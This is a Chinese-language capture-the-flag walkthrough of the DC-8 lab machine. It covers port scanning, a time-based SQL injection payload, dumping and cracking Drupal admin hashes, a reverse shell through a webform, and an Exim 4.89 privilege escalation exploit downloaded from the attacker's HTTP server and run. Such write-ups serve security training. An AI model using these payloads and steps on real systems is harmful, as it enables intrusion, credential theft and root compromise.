DC8靶场渗透流程(超详细)

靶机页面

 

信息收集

查看DC8的IP地址

通过查看到DC8的MAC地址为00:0C:29:BE:AB:C5，然后用arp-scan扫描我本机网段内存活的主机，发现DC8的MAC地址对应的IP为192.168.175.161

靶机的web页面

扫描DC8开启的端口

┌──(kali💋kali)-[~]
└─$ sudo nmap -Pn -A -p- -sS -sC -T4 192.168.175.161
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2023-04-11 06:26 EDT
Nmap scan report for 192.168.175.161
Host is up (0.00070s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 35:a7:e6:c4:a8:3c:63:1d:e1:c0:ca:a3:66:bc:88:bf (RSA)
|   256 ab:ef:9f:69:ac:ea:54:c6:8c:61:55:49:0a:e7:aa:d9 (ECDSA)
|_  256 7a:b2:c6:87:ec:93:76:d4:ea:59:4b:1b:c6:e8:73:f2 (ED25519)
80/tcp open  http    Apache httpd
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache
|_http-title: Welcome to DC-8 | DC-8
MAC Address: 00:0C:29:BE:AB:C5 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
​
TRACEROUTE
HOP RTT     ADDRESS
1   0.70 ms 192.168.175.161
​
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.19 seconds

端口	状态	服务	版本
22	open	ssh	OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
80	open	http	Apache httpd

web应用指纹信息

OS	Linux 3.X
Service	Apache
X-Powered-By	PHP
CMS	Drupal 7.67

droopescan扫描报告

┌──(k/droopescan scan drupal -u http://192.168.175.161
[+] Plali💋kali)-[~/tools/droopescan] └─$ .ugins found:                                                              
    ctools http://192.168.175.161/sites/all/modules/ctools/
        http://192.168.175.161/sites/all/modules/ctools/LICENSE.txt
        http://192.168.175.161/sites/all/modules/ctools/API.txt
    views http://192.168.175.161/sites/all/modules/views/
        http://192.168.175.161/sites/all/modules/views/README.txt
        http://192.168.175.161/sites/all/modules/views/LICENSE.txt
    webform http://192.168.175.161/sites/all/modules/webform/
        http://192.168.175.161/sites/all/modules/webform/README.md
        http://192.168.175.161/sites/all/modules/webform/LICENSE.txt
    ckeditor http://192.168.175.161/sites/all/modules/ckeditor/
        http://192.168.175.161/sites/all/modules/ckeditor/CHANGELOG.txt
        http://192.168.175.161/sites/all/modules/ckeditor/README.txt
        http://192.168.175.161/sites/all/modules/ckeditor/LICENSE.txt
    better_formats http://192.168.175.161/sites/all/modules/better_formats/
        http://192.168.175.161/sites/all/modules/better_formats/README.txt
        http://192.168.175.161/sites/all/modules/better_formats/LICENSE.txt
    profile http://192.168.175.161/modules/profile/
    php http://192.168.175.161/modules/php/
    image http://192.168.175.161/modules/image/
​
[+] Themes found:
    seven http://192.168.175.161/themes/seven/
    garland http://192.168.175.161/themes/garland/
​
[+] Possible version(s):
    7.67
​
[+] Possible interesting urls found:
    Default changelog file - http://192.168.175.161/CHANGELOG.txt
    Default admin - http://192.168.175.161/user/login
​
[+] Scan finished (0:00:29.525351 elapsed)

渗透流程

SQL注入漏洞

在靶机的网站欢迎页面，通过切换页面发现它的url后面的参数会变，如

http://192.168.175.161/?nid=1 #欢迎页面
http://192.168.175.161/?nid=2 #关于我们页面

这时可以猜想会有什么漏洞，先试一下是否存在SQL注入

http://192.168.175.161/?nid=1 and sleep(5) --+

果真迟钝了5s，说明存在SQL注入漏洞，然后可以通过SQL注入漏洞来读取管理员账户密码，直接SQLmap

爆库名

爆表名

Database: d7db                                                                                                                  
[88 tables]
+-----------------------------+
| filter                      |
| system                      |
| actions                     |
| authmap                     |
| batch                       |
| block                       |
| block_custom                |
| block_node_type             |
| block_role                  |
| blocked_ips                 |
| cache                       |
| cache_block                 |
| cache_bootstrap             |
| cache_field                 |
| cache_filter                |
| cache_form                  |
| cache_image                 |
| cache_menu                  |
| cache_page                  |
| cache_path                  |
| cache_views                 |
| cache_views_data            |
| ckeditor_input_format       |
| ckeditor_settings           |
| ctools_css_cache            |
| ctools_object_cache         |
| date_format_locale          |
| date_format_type            |
| date_formats                |
| field_config                |
| field_config_instance       |
| field_data_body             |
| field_data_field_image      |
| field_data_field_tags       |
| field_revision_body         |
| field_revision_field_image  |
| field_revision_field_tags   |
| file_managed                |
| file_usage                  |
| filter_format               |
| flood                       |
| history                     |
| image_effects               |
| image_styles                |
| menu_custom                 |
| menu_links                  |
| menu_router                 |
| node                        |
| node_access                 |
| node_revision               |
| node_type                   |
| queue                       |
| rdf_mapping                 |
| registry                    |
| registry_file               |
| role                        |
| role_permission             |
| search_dataset              |
| search_index                |
| search_node_links           |
| search_total                |
| semaphore                   |
| sequences                   |
| sessions                    |
| shortcut_set                |
| shortcut_set_users          |
| site_messages_table         |
| taxonomy_index              |
| taxonomy_term_data          |
| taxonomy_term_hierarchy     |
| taxonomy_vocabulary         |
| url_alias                   |
| users                       |
| users_roles                 |
| variable                    |
| views_display               |
| views_view                  |
| watchdog                    |
| webform                     |
| webform_component           |
| webform_conditional         |
| webform_conditional_actions |
| webform_conditional_rules   |
| webform_emails              |
| webform_last_download       |
| webform_roles               |
| webform_submissions         |
| webform_submitted_data      |
+-----------------------------+

账户名密码可能在users表里，爆列名

爆数据name，pass

admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z 
john  | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

密码为hash值，可以借助john密码工具破解

john：turtle

后台登录

通过得到的账户名和密码进行登录成功

然后再主页面的 Contact Us下的Form settings可以写代码

 

反弹shell

一点击保存，然后去contact us页面点击提交，代码就被执行，然后kali机就会收到反弹

进入交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

权限提升

查找具有SUID标识的命令

find / -perm -4000 2>/dev/null

找到一个exim4命令，exim是一款在Unix系统上使用的邮件服务，exim4在使用时具有root权限

查看版本，Exim version 4.89

查找相关漏洞

Exim 4.87 - 4.91 - Local Privilege Escalation | linux/local/46996.sh

这个对上了版本

用法

把46996.sh拷贝到本地并改名为666.sh，由于windows系统下编辑然后上传到linux系统执行会导致的格式错误，要加上本地编辑查看文件类型：set ff=unix，按shift+:set ff=unix，再回车保存退出，然后再去上传执行的时候才不会报错

并在kali开启http服务

python3 -m http.server 80

在shell里面下载这个666.sh，要进入/tmp目录再去下载，因为不需要root权限，再给666.sh加上权限chmod +x 666.sh

然后输入下面命令去执行它

./666.sh -m netcat

提权成功

查看flag